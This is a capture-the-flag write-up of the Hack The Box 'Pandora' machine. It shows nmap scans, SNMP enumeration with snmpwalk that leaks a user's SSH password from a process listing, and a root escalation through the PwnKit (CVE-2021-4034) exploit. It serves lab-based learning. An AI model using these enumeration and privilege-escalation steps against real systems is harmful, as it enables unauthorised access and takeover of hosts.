Pandora — HTB(Hack The Box) Write-up
Network Enumeration
I started with an nmap scan for services and version detection, found OpenSSH and when you see that, you have to hammer on it.
$ sudo nmap -sC -sV 10.10.11.136 -Pn -oN nmap_all.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2022–04–07 00:03 WAT
Nmap scan report for 10.10.11.136
Host is up (0.37s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
| 256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_ 256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Play | Landing
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Port 80 was running Apache, so I decided to check the site. After “fiddling with it” and achieving absolutely nothing, I decided to run another scan just in case I missed something.
— Fiddling with it: I got on the site, checked for login page, did some directory enumeration and those weren’t useful.
I put panda.htb in /etc/hosts and ran the nmap scan.
10.10.11.136 panda.htbThis time, I used different triggers that has helped me whilst playing on some VulnHub machines and I found something I had no idea about; SNMP.
$ sudo nmap -sU -sV -top-ports=20 panda.htb
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-07 00:27 WAT
Nmap scan report for panda.htb (10.10.11.136)
Host is up (0.24s latency).PORT STATE SERVICE VERSION
53/udp closed domain
67/udp closed dhcps
68/udp closed dhcpc
69/udp closed tftp
123/udp closed ntp
135/udp closed msrpc
137/udp closed netbios-ns
138/udp closed netbios-dgm
139/udp closed netbios-ssn
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
162/udp closed snmptrap
445/udp closed microsoft-ds
500/udp closed isakmp
514/udp closed syslog
520/udp closed route
631/udp closed ipp
1434/udp closed ms-sql-m
1900/udp closed upnp
4500/udp open|filtered nat-t-ike
49152/udp closed unknown
Service Info: Host: pandora
Exploiting
What’s SNMP? I did some research.
The Simple Network Management Protocol (SNMP) is an Internet Standard protocol that is based on the manager/agent model with a simple request/response format. The network manager issues a request and the managed agents will send responses in return.
Although it accomplished its goal of being an open, standard protocol, it was found to be lacking in key areas for certain managing applications. For example, it only supports 32-bit counters and has poor security features — a community string is the only security method in the SNMPv1.
Source: https://www.dpstele.com/snmp/v1-v2c-v3-difference.php
So basically… it’s showing me requests from a computer in plaintext? LOL
Naturally, I decided to find a way to exploit this and found a tool called snmpwalk. After reading its docs, I found out it just needed the following parameters: The version of SNMP, community string (public, private), and target.
The result was really, really messy, but I found something really gooooood.
$ snmpwalk -v 1 -c public panda.htb | tee snmpwalk.txt
iso.3.6.1.2.1.1.1.0 = STRING: "Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (4102551) 11:23:45.51
iso.3.6.1.2.1.1.4.0 = STRING: "Daniel"
iso.3.6.1.2.1.1.5.0 = STRING: "pandora"
iso.3.6.1.2.1.1.6.0 = STRING: "Mississippi"
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.25.4.2.1.5.824 = STRING: "-f"
iso.3.6.1.2.1.25.4.2.1.5.839 = STRING: "-f"
iso.3.6.1.2.1.25.4.2.1.5.841 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p [REDACTED]'"
iso.3.6.1.2.1.25.4.2.1.5.850 = STRING: "-LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f -p /run/snmpd.pid"
iso.3.6.1.2.1.25.4.2.1.5.851 = ""
iso.3.6.1.2.1.25.4.2.1.5.853 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.855 = STRING: "-f"
iso.3.6.1.2.1.25.4.2.1.5.949 = ""
iso.3.6.1.2.1.25.4.2.1.5.957 = STRING: "-o -p -- \\u --noclear tty1 linux"Yep, the SSH login!
iso.3.6.1.2.1.25.4.2.1.5.841 = STRING: “-c sleep 30; /bin/bash -c ‘/usr/bin/host_check -u daniel -p [REDACTED]’”After logging in, I found out there was this executable called linpeas.sh and it’s one of my favourite things. What it does is search for possible paths that would lead to privesc (Privilege Escalaction).
You can find the tool here: https://github.com/carlospolop/PEASS-ng/tree/master/linPEAShttps://github.com/carlospolop/PEASS-ng/tree/master/linPEAS
daniel@pandora:~$ ls
"DON'T REMOVE" tmp
daniel@pandora:~$ cd tmp/
daniel@pandora:~/tmp$ ls
CVE-2021-4034-main cve.zip lin.log linpeas.shI ran it and behold! It had CVE-2021–4034 aka Pwnkit.
Cool! Apparently, the exploit was also there. You could copy these tools over to the machine by the way, I just happened to find these in there.
daniel@pandora:~/tmp/CVE-2021-4034-main$ ./cve-2021-4034
ls
'GCONV_PATH=.' Makefile cve-2021-4034 cve-2021-4034.sh gconv-modules pwnkit.so
LICENSE README.md cve-2021-4034.c dry-run pwnkit.c
# cd ..Boom, I’ve got root.
Located the user.txt and root.txt and submitted the flags.
What I Learnt From This Box
I saw something that I’ve never seen before on a machine. Sure, I was intimidated and clueless, but I was excited that doing research is actually really helpful. Yes, Googling is part of the hacking process and don’t let anyone tell you otherwise.
I would never have discovered these tools which helped me exploit SNMP such as snmpwalk & snmpcheck without the vast knowledge of the internet being just a Google search away.
I hope you enjoyed this writeup. Happy hacking!
